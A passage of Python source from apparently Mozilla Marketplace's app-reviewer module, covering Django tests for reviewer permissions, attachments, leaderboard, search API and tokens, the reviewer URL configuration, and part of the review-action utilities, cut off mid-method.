    def test_no_apps_reviewing(self):
        eq_(len(self.client.get(self.url).context['apps']), 0)

    def test_apps_reviewing(self):
        self._view_app(self.apps[0].id)
        eq_(len(self.client.get(self.url).context['apps']), 1)

    def test_multiple_reviewers_no_cross_streams(self):
        self._view_app(self.apps[0].id)
        self._view_app(self.apps[1].id)
        eq_(len(self.client.get(self.url).context['apps']), 2)
        # Now view an app as another user and verify app.
        self.client.login(username='[email protected]', password='password')
        self._view_app(self.apps[2].id)
        eq_(len(self.client.get(self.url).context['apps']), 1)
        # Check original user again to make sure app list didn't increment.
        self.login_as_editor()
        eq_(len(self.client.get(self.url).context['apps']), 2)
@override_settings(REVIEWER_ATTACHMENTS_PATH=ATTACHMENTS_DIR)
class TestAttachmentDownload(amo.tests.TestCase):
    """Permission and header checks for review-activity attachment downloads."""
    fixtures = ['data/user_editor', 'data/user_editor_group',
                'data/group_editor',
                'data/user_999'] + fixture('webapp_337141')

    def _attachment(self, log):
        # Attach the known fixture file to the given activity log entry.
        return ActivityLogAttachment.objects.create(activity_log=log,
                                                    filepath='bacon.jpg',
                                                    mimetype='image/jpeg')

    def _response(self, params=None, **kwargs):
        # BUGFIX: `params={}` was a mutable default argument shared across
        # calls; default to None and substitute a fresh dict per call.
        if params is None:
            params = {}
        url = self.ala.get_absolute_url()
        return self.client.get(url, params, **kwargs)

    def setUp(self):
        editor = UserProfile.objects.get(pk=5497308)
        self.app = Webapp.objects.get(pk=337141)
        self.version = self.app.latest_version
        # Log a version comment so there is an activity log to attach to.
        self.al = amo.log(amo.LOG.COMMENT_VERSION, self.app,
                          self.version, user=editor)
        self.ala = self._attachment(self.al)

    def test_permissions_editor(self):
        self.client.login(username='[email protected]', password='password')
        response = self._response()
        eq_(response.status_code, 200, 'Editor cannot access attachment')

    def test_permissions_regular(self):
        self.client.login(username='[email protected]', password='password')
        response = self._response()
        eq_(response.status_code, 403, 'Regular user can access attachment')

    def test_headers(self):
        self.client.login(username='[email protected]', password='password')
        response = self._response()
        eq_(response._headers['content-type'][1], 'application/force-download',
            'Attachment not served as application/force-download')
        eq_(response._headers['content-disposition'][1],
            'attachment; filename=bacon.jpg',
            'Attachment not served with correct Content-Disposition header')
        eq_(response._headers['content-length'][1], '130737',
            'Attachment not served with correct Content-Length header')
class TestLeaderboard(AppReviewerTest):
    """Checks ranking and level labels on the reviewer leaderboard page."""
    fixtures = ['base/users']

    def setUp(self):
        self.url = reverse('reviewers.leaderboard')
        self.user = UserProfile.objects.get(email='[email protected]')
        self.login_as_editor()
        amo.set_user(self.user)

    def _award_points(self, user, score):
        # Record a manual-review score entry for `user`.
        ReviewerScore.objects.create(user=user, note_key=amo.REVIEWED_MANUAL,
                                     score=score, note='Thing.')

    def test_leaderboard_ranks(self):
        users = (self.user,
                 UserProfile.objects.get(email='[email protected]'),
                 UserProfile.objects.get(email='[email protected]'))
        level_0 = amo.REVIEWED_LEVELS[0]
        level_1 = amo.REVIEWED_LEVELS[1]
        # users[0] sits just below the first level; the others just above.
        self._award_points(users[0], level_0['points'] - 1)
        self._award_points(users[1], level_0['points'] + 1)
        self._award_points(users[2], level_0['points'] + 2)

        def get_cells():
            # Flatten the leaderboard's name/level cells in document order.
            doc = pq(self.client.get(self.url).content.decode('utf-8'))
            cells = doc('#leaderboard > tbody > tr > .name, '
                        '#leaderboard > tbody > tr > .level')
            return [cells.eq(i).text() for i in range(cells.length)]

        eq_(get_cells(),
            [users[2].display_name,
             users[1].display_name,
             level_0['name'],
             users[0].display_name])
        # One extra point pushes users[0] over the level-0 threshold.
        self._award_points(users[0], 1)
        eq_(get_cells(),
            [users[2].display_name,
             users[1].display_name,
             users[0].display_name,
             level_0['name']])
        # Drop users[0] back below the threshold and lift users[2] to the
        # next level.
        self._award_points(users[0], -1)
        self._award_points(users[2], level_1['points'] - level_0['points'])
        eq_(get_cells(),
            [users[2].display_name,
             level_1['name'],
             users[1].display_name,
             level_0['name'],
             users[0].display_name])
class TestReviewPage(amo.tests.TestCase):
    """Rendering checks for the single-app review page (IARC behaviours)."""
    fixtures = fixture('user_editor', 'user_editor_group', 'group_editor')

    def setUp(self):
        self.create_switch('iarc')
        self.app = app_factory(status=amo.STATUS_PENDING)
        self.reviewer = UserProfile.objects.get()
        self.url = reverse('reviewers.apps.review', args=[self.app.app_slug])

    def _render(self):
        # Render the review page as the reviewer and return a pyquery doc.
        req = req_factory_factory(self.url, user=self.reviewer)
        return pq(app_review(req, app_slug=self.app.app_slug).content)

    def test_iarc_ratingless_disable_approve_btn(self):
        # Without a rating the approve action is disabled; reject is not.
        self.app.update(status=amo.STATUS_NULL)
        doc = self._render()
        assert (doc('#review-actions input[value=public]')
                .parents('li').hasClass('disabled'))
        assert not (doc('#review-actions input[value=reject]')
                    .parents('li').hasClass('disabled'))

    def test_iarc_content_ratings(self):
        for body in (mkt.ratingsbodies.CLASSIND.id, mkt.ratingsbodies.USK.id):
            self.app.content_ratings.create(ratings_body=body, rating=0)
        doc = self._render()
        # Both ratings render in the desktop and the mobile layouts.
        eq_(doc('.reviewers-desktop .content-rating').length, 2)
        eq_(doc('.reviewers-mobile .content-rating').length, 2)
class TestReviewTranslate(AppReviewerTest):
    """Tests the review-translation endpoint (Google Translate backed)."""
    def setUp(self):
        self.login_as_editor()
        self.create_switch('reviews-translate')
        user = UserProfile.objects.create(username='diego')
        app = amo.tests.app_factory(slug='myapp')
        self.review = app.reviews.create(title=u'yes', body=u'oui',
                                         addon=app, user=user,
                                         editorreview=True, rating=4)
    def test_regular_call(self):
        # A non-AJAX request redirects straight to Google Translate.
        res = self.client.get(reverse('reviewers.review_translate',
                                      args=[self.review.addon.slug,
                                            self.review.id, 'fr']))
        self.assert3xx(res, 'https://translate.google.com/#auto/fr/oui', 302)
    @mock.patch('mkt.reviewers.views.requests')
    def test_ajax_call(self, requests):
        # Mock requests with a successful Translate API payload.
        response = mock.Mock(status_code=200)
        response.json.return_value = {
            u'data': {
                u'translations': [{
                    u'translatedText': u'oui',
                    u'detectedSourceLanguage': u'fr'
                }]
            }
        }
        requests.get.return_value = response
        # Call translation; an AJAX request returns the translated JSON.
        review = self.review
        res = self.client.get_ajax(reverse('reviewers.review_translate',
                                           args=[review.addon.slug, review.id,
                                                 'fr']),)
        eq_(res.status_code, 200)
        eq_(res.content, '{"body": "oui", "title": "oui"}')
    @mock.patch('mkt.reviewers.views.requests')
    def test_invalid_api_key(self, requests):
        # Mock requests with the Translate API's invalid-key error payload.
        response = mock.Mock(status_code=400)
        response.json.return_value = {
            'error': {
                'code': 400,
                'errors': [
                    {'domain': 'usageLimits',
                     'message': 'Bad Request',
                     'reason': 'keyInvalid'}
                ],
                'message': 'Bad Request'
            }
        }
        requests.get.return_value = response
        # Call translation; the upstream error status is passed through.
        review = self.review
        res = self.client.get_ajax(reverse('reviewers.review_translate',
                                           args=[review.addon.slug, review.id,
                                                 'fr']),)
        eq_(res.status_code, 400)
########NEW FILE########
__FILENAME__ = test_views_api
import json
from datetime import datetime
from django.conf import settings
from django.core.cache import cache
from django.core.urlresolvers import reverse
from cache_nuggets.lib import Token
from nose.tools import eq_
from test_utils import RequestFactory
import amo
import mkt.regions
from access.models import GroupUser
from addons.models import Category
from amo.tests import ESTestCase
from tags.models import Tag
from users.models import UserProfile
from mkt.api.tests.test_oauth import RestOAuthClient, RestOAuth
from mkt.api.models import Access, generate
from mkt.constants.features import FeatureProfile
from mkt.reviewers.utils import AppsReviewing
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
class TestReviewing(RestOAuth):
    """API tests for the 'apps currently being reviewed' endpoint."""
    fixtures = fixture('user_2519', 'webapp_337141')

    def setUp(self):
        super(TestReviewing, self).setUp()
        self.list_url = reverse('reviewing-list')
        self.user = UserProfile.objects.get(pk=2519)
        self.req = RequestFactory().get('/')
        self.req.amo_user = self.user

    def test_verbs(self):
        # BUGFIX: ('get') is just the string 'get', not a 1-tuple; add the
        # trailing comma so `_allowed_verbs` receives a proper tuple of verbs.
        self._allowed_verbs(self.list_url, ('get',))

    def test_not_allowed(self):
        # Anonymous clients may not list the reviewing queue.
        eq_(self.anon.get(self.list_url).status_code, 403)

    def test_still_not_allowed(self):
        # Authenticated-but-unprivileged clients are rejected too.
        eq_(self.client.get(self.list_url).status_code, 403)

    def add_perms(self):
        self.grant_permission(self.user, 'Apps:Review')

    def test_allowed(self):
        self.add_perms()
        res = self.client.get(self.list_url)
        eq_(res.status_code, 200, res.content)
        data = json.loads(res.content)
        eq_(data['objects'], [])

    def test_some(self):
        self.add_perms()
        # This feels rather brittle.
        cache.set('%s:review_viewing:%s' % (settings.CACHE_PREFIX, 337141),
                  2519, 50 * 2)
        AppsReviewing(self.req).add(337141)
        res = self.client.get(self.list_url)
        data = json.loads(res.content)
        eq_(data['objects'][0]['resource_uri'],
            reverse('app-detail', kwargs={'pk': 337141}))
class TestApiReviewer(RestOAuth, ESTestCase):
    """Elasticsearch-backed tests for the reviewers search API.

    Each mutation of `self.webapp` is followed by `self.refresh('webapp')`
    to push the change into the search index before querying.
    """
    fixtures = fixture('webapp_337141', 'user_2519')
    def setUp(self):
        super(TestApiReviewer, self).setUp()
        self.user = UserProfile.objects.get(pk=2519)
        self.profile = self.user
        self.profile.update(read_dev_agreement=datetime.now())
        self.grant_permission(self.profile, 'Apps:Review')
        self.access = Access.objects.create(
            key='test_oauth_key', secret=generate(), user=self.user)
        self.url = reverse('reviewers-search-api')
        self.webapp = Webapp.objects.get(pk=337141)
        self.category = Category.objects.create(name='test',
                                                type=amo.ADDON_WEBAPP)
        self.webapp.update(status=amo.STATUS_PENDING)
        self.refresh('webapp')
    def test_fields(self):
        # The serializer exposes exactly this fixed field set.
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        self.assertSetEqual(obj.keys(), ['device_types', 'id', 'is_escalated',
            'is_packaged', 'latest_version', 'name', 'premium_type', 'price',
            'slug', 'status'])
        eq_(obj['latest_version']['status'], 4)
    def test_anonymous_access(self):
        res = self.anon.get(self.url)
        eq_(res.status_code, 403)
    def test_non_reviewer_access(self):
        # Removing the reviewer group locks the user out again.
        GroupUser.objects.filter(group__rules='Apps:Review',
                                 user=self.profile).delete()
        res = self.client.get(self.url)
        eq_(res.status_code, 403)
    def test_owner_still_non_reviewer_access(self):
        # Being the app's author does not grant access to the reviewer API.
        user = Webapp.objects.get(pk=337141).authors.all()[0]
        access = Access.objects.create(
            key='test_oauth_key_owner', secret=generate(), user=user)
        client = RestOAuthClient(access)
        res = client.get(self.url)
        eq_(res.status_code, 403)
    def test_status(self):
        # No filter: the pending fixture app is returned.
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)
        res = self.client.get(self.url, {'status': 'pending'})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)
        # A non-matching status filter yields no results.
        res = self.client.get(self.url, {'status': 'rejected'})
        eq_(res.status_code, 200)
        objs = res.json['objects']
        eq_(len(objs), 0)
        self.webapp.update(status=amo.STATUS_REJECTED)
        self.refresh('webapp')
        res = self.client.get(self.url, {'status': 'rejected'})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)
        self.webapp.update(status=amo.STATUS_PUBLIC)
        self.refresh('webapp')
        res = self.client.get(self.url, {'status': 'public'})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)
        # 'any' disables the status filter entirely.
        res = self.client.get(self.url, {'status': 'any'})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)
        # Unknown statuses are a validation error.
        res = self.client.get(self.url, {'status': 'vindaloo'})
        eq_(res.status_code, 400)
        error = res.json['detail']
        eq_(error.keys(), ['status'])
    def test_is_escalated(self):
        # Fixture app is not escalated, so True matches nothing.
        res = self.client.get(self.url, {'is_escalated': True})
        eq_(res.status_code, 200)
        objs = res.json['objects']
        eq_(len(objs), 0)
        res = self.client.get(self.url, {'is_escalated': False})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)
        # None means "don't filter on this flag".
        res = self.client.get(self.url, {'is_escalated': None})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)
    def test_is_tarako(self):
        # Tarako membership is modelled as the 'tarako' tag.
        Tag(tag_text='tarako').save_tag(self.webapp)
        self.webapp.save()
        self.refresh()
        res = self.client.get(self.url, {'is_tarako': True})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)
        res = self.client.get(self.url, {'is_tarako': False})
        eq_(res.status_code, 200)
        objs = res.json['objects']
        eq_(len(objs), 0)
        res = self.client.get(self.url, {'is_tarako': None})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)
    def test_has_editors_comment(self):
        res = self.client.get(self.url, {'has_editor_comment': True})
        eq_(res.status_code, 200)
        objs = res.json['objects']
        eq_(len(objs), 0)
        res = self.client.get(self.url, {'has_editor_comment': False})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)
        res = self.client.get(self.url, {'has_editor_comment': None})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)
    def test_has_info_request(self):
        res = self.client.get(self.url, {'has_info_request': True})
        eq_(res.status_code, 200)
        objs = res.json['objects']
        eq_(len(objs), 0)
        res = self.client.get(self.url, {'has_info_request': False})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)
        res = self.client.get(self.url, {'has_info_request': None})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)
    def test_addon_type(self):
        res = self.client.get(self.url, {'type': 'app'})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)
        # Unknown types are a validation error.
        res = self.client.get(self.url, {'type': 'vindaloo'})
        eq_(res.status_code, 400)
        error = res.json['detail']
        eq_(error.keys(), ['type'])
    def test_no_region_filtering(self):
        # Region exclusions must NOT hide apps from reviewers.
        self.webapp.addonexcludedregion.create(region=mkt.regions.BR.id)
        self.webapp.save()
        self.refresh('webapp')
        res = self.client.get(self.url, {'region': 'br'})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)
    def test_no_feature_profile_filtering(self):
        feature_profile = FeatureProfile().to_signature()
        qs = {'q': 'something', 'pro': feature_profile, 'dev': 'firefoxos'}
        # Enable an app feature that doesn't match one in our profile.
        self.webapp.current_version.features.update(has_pay=True)
        self.webapp.save()
        self.refresh('webapp')
        # The reviewer search ignores the feature-profile mismatch.
        res = self.client.get(self.url, qs)
        eq_(res.status_code, 200)
        eq_(len(res.json['objects']), 1)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)
    def test_no_flash_filtering(self):
        # Flash-using apps are not hidden from reviewers either.
        f = self.webapp.get_latest_file()
        f.uses_flash = True
        f.save()
        self.webapp.save()
        self.refresh('webapp')
        res = self.client.get(self.url, {'dev': 'firefoxos'})
        eq_(res.status_code, 200)
        eq_(len(res.json['objects']), 1)
    def test_no_premium_filtering(self):
        # Premium apps remain visible in the reviewer search.
        self.webapp.update(premium_type=amo.ADDON_PREMIUM)
        self.refresh('webapp')
        res = self.client.get(self.url, {'dev': 'android'})
        eq_(res.status_code, 200)
        eq_(len(res.json['objects']), 1)
class TestApproveRegion(RestOAuth):
    """API tests for the per-region app approval endpoint (China queue)."""
    fixtures = fixture('user_2519', 'webapp_337141')

    def url(self, **kwargs):
        # Build the approve-region URL, defaulting to app 337141 / China.
        params = {'pk': '337141', 'region': 'cn'}
        params.update(kwargs)
        return reverse('approve-region', kwargs=params)

    def _pending_app(self):
        # Flag the fixture app as pending in the China region queue.
        webapp = Webapp.objects.get(id=337141)
        webapp.geodata.set_status('cn', amo.STATUS_PENDING, save=True)
        return webapp

    def test_verbs(self):
        self.grant_permission(self.profile, 'Apps:ReviewRegionCN')
        self._allowed_verbs(self.url(), ['post'])

    def test_anon(self):
        eq_(self.anon.post(self.url()).status_code, 403)

    def test_bad_webapp(self):
        self.grant_permission(self.profile, 'Apps:ReviewRegionCN')
        eq_(self.client.post(self.url(pk='999')).status_code, 404)

    def test_webapp_not_pending_in_region(self):
        self.grant_permission(self.profile, 'Apps:ReviewRegionCN')
        eq_(self.client.post(self.url()).status_code, 404)

    def test_good_but_no_permission(self):
        eq_(self.client.post(self.url()).status_code, 403)

    def test_good_webapp_but_wrong_region_permission(self):
        # Holding the Brazil permission doesn't grant the China queue.
        self.grant_permission(self.profile, 'Apps:ReviewRegionBR')
        self._pending_app()
        eq_(self.client.post(self.url()).status_code, 403)

    def test_good_webapp_but_wrong_region_queue(self):
        # The China permission doesn't grant the Brazil queue.
        self.grant_permission(self.profile, 'Apps:ReviewRegionCN')
        self._pending_app()
        eq_(self.client.post(self.url(region='br')).status_code, 403)

    def test_good_rejected(self):
        # Posting without an 'approve' payload rejects the app.
        self.grant_permission(self.profile, 'Apps:ReviewRegionCN')
        webapp = self._pending_app()
        res = self.client.post(self.url())
        eq_(res.status_code, 200)
        payload = json.loads(res.content)
        eq_(payload['approved'], False)
        eq_(webapp.geodata.reload().get_status('cn'), amo.STATUS_REJECTED)

    def test_good_approved(self):
        self.grant_permission(self.profile, 'Apps:ReviewRegionCN')
        webapp = self._pending_app()
        res = self.client.post(self.url(), data=json.dumps({'approve': '1'}))
        eq_(res.status_code, 200)
        payload = json.loads(res.content)
        eq_(payload['approved'], True)
        eq_(webapp.geodata.reload().get_status('cn'), amo.STATUS_PUBLIC)
class TestGenerateToken(RestOAuth):
    """API tests for generating short-lived reviewer tokens for an app."""
    fixtures = fixture('user_2519', 'webapp_337141')

    def setUp(self):
        super(TestGenerateToken, self).setUp()
        self.app = Webapp.objects.get(pk=337141)
        self.url = reverse('generate-reviewer-token', args=[self.app.app_slug])
        self.user = UserProfile.objects.get(pk=2519)
        self.req = RequestFactory().get('/')
        self.req.amo_user = self.user

    def test_verbs(self):
        # BUGFIX: ('post') is just the string 'post', not a 1-tuple; add the
        # trailing comma so `_allowed_verbs` receives a proper tuple of verbs.
        self._allowed_verbs(self.url, ('post',))

    def test_not_allowed(self):
        eq_(self.anon.post(self.url).status_code, 403)

    def test_still_not_allowed(self):
        eq_(self.client.post(self.url).status_code, 403)

    def test_token(self):
        self.grant_permission(self.user, 'Apps:Review')
        res = self.client.post(self.url)
        eq_(res.status_code, 200, res.content)
        data = json.loads(res.content)
        assert 'token' in data
        # Check data in token.
        assert Token.valid(data['token'], data={'app_id': self.app.id})
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import include, patterns, url
import amo
from apps.editors.views import queue_viewing, review_viewing
from mkt.receipts.urls import receipt_patterns
from mkt.reviewers import views
# All URLs under /reviewers/.
url_patterns = patterns('',
    # Reviewer landing pages.
    url(r'^apps/$', views.home, name='reviewers.home'),
    url(r'^$', views.route_reviewer, name='reviewers'),
    # Review queues.
    url(r'^apps/queue/$', views.queue_apps,
        name='reviewers.apps.queue_pending'),
    url(r'^apps/queue/region/(?P<region>[^ /]+)?$', views.queue_region,
        name='reviewers.apps.queue_region'),
    url(r'^apps/queue/rereview/$', views.queue_rereview,
        name='reviewers.apps.queue_rereview'),
    url(r'^apps/queue/updates/$', views.queue_updates,
        name='reviewers.apps.queue_updates'),
    url(r'^apps/queue/escalated/$', views.queue_escalated,
        name='reviewers.apps.queue_escalated'),
    url(r'^apps/queue/moderated/$', views.queue_moderated,
        name='reviewers.apps.queue_moderated'),
    url(r'^apps/queue/device/$', views.queue_device,
        name='reviewers.apps.queue_device'),
    # Reviewing a single app.
    url(r'^apps/review/%s$' % amo.APP_SLUG, views.app_review,
        name='reviewers.apps.review'),
    url(r'^apps/review/%s/manifest$' % amo.APP_SLUG, views.app_view_manifest,
        name='reviewers.apps.review.manifest'),
    url(r'^apps/review/attachment/(\d+)$', views.attachment,
        name='reviewers.apps.review.attachment'),
    url(r'^apps/review/%s/abuse$' % amo.APP_SLUG, views.app_abuse,
        name='reviewers.apps.review.abuse'),
    url(r'^apps/logs$', views.logs, name='reviewers.apps.logs'),
    url(r'^apps/motd$', views.motd, name='reviewers.apps.motd'),
    # "Currently viewing" locks shared with the editors app.
    url(r'^queue_viewing$', queue_viewing, name='editors.queue_viewing'),
    url(r'^review_viewing$', review_viewing, name='editors.review_viewing'),
    url(r'^apps/reviewing$', views.apps_reviewing,
        name='reviewers.apps.apps_reviewing'),
    # Receipts and (mini-)manifests used for reviewer installs.
    url(r'^receipt/', include(receipt_patterns)),
    url(r'^%s/(?P<version_id>\d+)/mini-manifest$' % amo.APP_SLUG,
        views.mini_manifest, name='reviewers.mini_manifest'),
    url(r'^signed/%s/(?P<version_id>\d+)$' % amo.APP_SLUG,
        views.get_signed_packaged, name='reviewers.signed'),
    # Reviewer stats pages.
    url(r'''^performance/(?P<username>[^/<>"']+)?$''', views.performance,
        name='reviewers.performance'),
    url(r'^leaderboard/$', views.leaderboard, name='reviewers.leaderboard'),
)
# Reviewer API endpoints. All regexes use raw strings so backslash escapes
# like \d and \w reach the regex engine verbatim (previously two patterns
# were plain strings — same bytes, but inconsistent and fragile).
api_patterns = patterns('',
    url(r'^reviewers/search', views.ReviewersSearchView.as_view(),
        name='reviewers-search-api'),
    url(r'^reviewers/app/(?P<pk>[^/<>"\']+)/approve/(?P<region>[^ /]+)?$',
        views.ApproveRegion.as_view(), name='approve-region'),
    url(r'^reviewers/reviewing', views.ReviewingView.as_view(),
        name='reviewing-list'),
    url(r'^reviewers/(?P<addon_slug>[\w-]+)/review/(?P<review_pk>\d+)'
        r'/translate/(?P<language>[a-z]{2}(-[A-Z]{2})?)$',
        views.review_translate,
        name='reviewers.review_translate'),
    url(r'^reviewers/app/(?P<pk>[^/<>"\']+)/token$',
        views.GenerateToken.as_view(), name='generate-reviewer-token'),
)
########NEW FILE########
__FILENAME__ = utils
import json
import urllib
from datetime import datetime
from django.conf import settings
from django.core.cache import cache
from django.core.urlresolvers import reverse
from django.utils import translation
from django.utils.datastructures import SortedDict
import commonware.log
import waffle
from tower import ugettext_lazy as _lazy
import amo
from access import acl
from amo.helpers import absolutify
from amo.utils import JSONEncoder, send_mail_jinja, to_language
from editors.models import EscalationQueue, RereviewQueue, ReviewerScore
from files.models import File
from mkt.comm.utils import create_comm_note
from mkt.constants import comm
from mkt.constants.features import FeatureProfile
from mkt.site.helpers import product_as_dict
from mkt.webapps.models import Webapp
log = commonware.log.getLogger('z.mailer')
def send_mail(subject, template, context, emails, perm_setting=None, cc=None,
              attachments=None, reply_to=None):
    """Send a reviewer email rendered from `template` to `emails`.

    The Reply-To header defaults to the Marketplace reviewers address when
    no explicit `reply_to` is given.
    """
    reply_to = reply_to or settings.MKT_REVIEWERS_EMAIL
    # Link to our newfangled "Account Settings" page.
    manage_url = absolutify('/settings') + '#notifications'
    send_mail_jinja(subject, template, context, recipient_list=emails,
                    from_email=settings.MKT_REVIEWERS_EMAIL,
                    use_blacklist=False, perm_setting=perm_setting,
                    manage_url=manage_url, headers={'Reply-To': reply_to},
                    cc=cc, attachments=attachments)
class ReviewBase(object):
    """Shared state and helpers for app review actions.

    Subclasses implement concrete actions (approve, reject, ...); this base
    class records which queues the add-on currently sits in and provides
    helpers for updating statuses, logging notes and emailing developers.
    """

    def __init__(self, request, addon, version, review_type,
                 attachment_formset=None):
        self.request = request
        self.user = self.request.user
        self.addon = addon
        self.version = version
        self.review_type = review_type
        self.files = None
        self.comm_thread = None
        self.attachment_formset = attachment_formset
        # Queue membership flags, computed once up front.
        self.in_pending = self.addon.status == amo.STATUS_PENDING
        self.in_rereview = RereviewQueue.objects.filter(
            addon=self.addon).exists()
        self.in_escalate = EscalationQueue.objects.filter(
            addon=self.addon).exists()

    def get_attachments(self):
        """
        Returns a list of triples suitable to be attached to an email.
        """
        # BUGFIX: also catch AttributeError/KeyError so a missing formset
        # (attachment_formset=None, the constructor default) or an absent
        # management-form key returns an empty list instead of raising.
        try:
            num = int(self.attachment_formset.data['attachment-TOTAL_FORMS'])
        except (AttributeError, KeyError, TypeError, ValueError):
            return []
        else:
            files = []
            for i in xrange(num):
                attachment_name = 'attachment-%d-attachment' % i
                attachment = self.request.FILES.get(attachment_name)
                if attachment:
                    attachment.open()
                    files.append((attachment.name, attachment.read(),
                                  attachment.content_type))
            return files

    def set_addon(self, **kw):
        """Alters addon using provided kwargs."""
        self.addon.update(_signal=False, **kw)

    def set_reviewed(self):
        """Sets reviewed timestamp on version."""
        self.version.update(_signal=False, reviewed=datetime.now())

    def set_files(self, status, files, hide_disabled_file=False):
        """Change the files to be the new status and hide as appropriate."""
        for file in files:
            file.update(_signal=False, datestatuschanged=datetime.now(),
                        reviewed=datetime.now(), status=status)
            if hide_disabled_file:
                file.hide_disabled_file()

    def create_note(self, action):
        """
        Permissions default to developers + reviewers + Mozilla contacts.
        For escalation/comment, exclude the developer from the conversation.
        """
        details = {'comments': self.data['comments'],
                   'reviewtype': self.review_type}
        if self.files:
            details['files'] = [f.id for f in self.files]
        # Commbadge (the future).
        perm_overrides = {
            comm.ESCALATION: {'developer': False},
            comm.REVIEWER_COMMENT: {'developer': False},
        }
        note_type = comm.ACTION_MAP(action.id)
        self.comm_thread, self.comm_note = create_comm_note(
            self.addon, self.version, self.request.amo_user,
            self.data['comments'], note_type=note_type,
            # Ignore switch so we don't have to re-migrate new notes.
            perms=perm_overrides.get(note_type), no_switch=True,
            attachments=self.attachment_formset)
        # ActivityLog (ye olde).
        amo.log(action, self.addon, self.version, user=self.user,
                created=datetime.now(), details=details,
                attachments=self.attachment_formset)

    def notify_email(self, template, subject, fresh_thread=False):
        """Notify the authors that their app has been reviewed."""
        if waffle.switch_is_active('comm-dashboard'):
            # Communication dashboard uses send_mail_comm.
            return
        data = self.data.copy()
        data.update(self.get_context_data())
        data['tested'] = ''
        dt, br = data.get('device_types'), data.get('browsers')
        if dt and br:
            data['tested'] = 'Tested on %s with %s' % (dt, br)
        elif dt and not br:
            data['tested'] = 'Tested on %s' % dt
        elif not dt and br:
            data['tested'] = 'Tested with %s' % br
        emails = list(self.addon.authors.values_list('email', flat=True))
        cc_email = self.addon.get_mozilla_contacts()
        log.info(u'Sending email for %s' % self.addon)
        send_mail(subject % data['name'],
                  'reviewers/emails/decisions/%s.txt' % template, data,
                  emails, perm_setting='app_reviewed', cc=cc_email,
                  attachments=self.get_attachments())

    def get_context_data(self):
        """Build the template context shared by all decision emails."""
        # We need to display the name in some language that is relevant to the
        # recipient(s) instead of using the reviewer's. addon.default_locale
        # should work.
        if self.addon.name.locale != self.addon.default_locale:
            lang = to_language(self.addon.default_locale)
            with translation.override(lang):
                app = Webapp.objects.get(id=self.addon.id)
        else:
            app = self.addon
        return {'name': app.name,
                'reviewer': self.request.user.name,
                'detail_url': absolutify(
                    app.get_url_path(add_prefix=False)),
                'review_url': absolutify(reverse('reviewers.apps.review',
                                                 args=[app.app_slug],
                                                 add_prefix=False)),
                'status_url': absolutify(app.get_dev_url('versions')),
                'comments': self.data['comments'],
                'MKT_SUPPORT_EMAIL': settings.MKT_SUPPORT_EMAIL,
                'SITE_URL': settings.SITE_URL}

    def request_information(self):
        """Send a request for information to the authors."""
        emails = list(self.addon.authors.values_list('email', flat=True))
        self.create_note(amo.LOG.REQUEST_INFORMATION)
        self.version.update(has_info_request=True)
        log.info(u'Sending request for information for %s to %s' %
                 (self.addon, emails))
        # Create thread.
        self.notify_email('info', u'More information needed to review: %s')
class ReviewApp(ReviewBase):
    def set_data(self, data):
        """Store the cleaned review-form data and this version's files."""
        self.data = data
        self.files = self.version.files.all()
    def process_public(self):
        """
        Makes an app public or public waiting.
        Changes status to Public/Public Waiting.
        Creates Approval note/email.
        Returns the result of awarding reviewer incentive points.
        """
        if self.addon.has_incomplete_status():
            # Failsafe.
            return
        # Hold onto the status before we change it.
        status = self.addon.status
        if self.addon.make_public == amo.PUBLIC_IMMEDIATELY:
            self._process_public_immediately()
        else:
            self._process_public_waiting()
        if self.in_escalate:
            # Approval resolves any outstanding escalation.
            EscalationQueue.objects.filter(addon=self.addon).delete()
        # Clear priority_review flag on approval - it's not persistent.
        if self.addon.priority_review:
            self.addon.update(priority_review=False)
        # Assign reviewer incentive scores.
        return ReviewerScore.award_points(self.request.amo_user, self.addon,
                                          status)
    def _process_public_waiting(self):
        """Make an app public waiting."""
        if self.addon.has_incomplete_status():
            # Failsafe.
            return
        self.addon.sign_if_packaged(self.version.pk)
        self.set_files(amo.STATUS_PUBLIC_WAITING, self.version.files.all())
        # An already-public app keeps its status; only the new files wait.
        if self.addon.status != amo.STATUS_PUBLIC:
            self.set_addon(status=amo.STATUS_PUBLIC_WAITING,
                           highest_status=amo.STATUS_PUBLIC_WAITING)
        self.set_reviewed()
        self.create_note(amo.LOG.APPROVE_VERSION_WAITING)
        self.notify_email('pending_to_public_waiting',
                          u'App approved but waiting: %s')
        log.info(u'Making %s public but pending' % self.addon)
def _process_public_immediately(self):
"""Changes status to Public."""
if self.addon.has_incomplete_status():
# Failsafe.
return
self.addon.sign_if_packaged(self.version.pk)
# Save files first, because set_addon checks to make sure there
# is at least one public file or it won't make the addon public.
self.set_files(amo.STATUS_PUBLIC, self.version.files.all())
if self.addon.status != amo.STATUS_PUBLIC:
self.set_addon(status=amo.STATUS_PUBLIC,
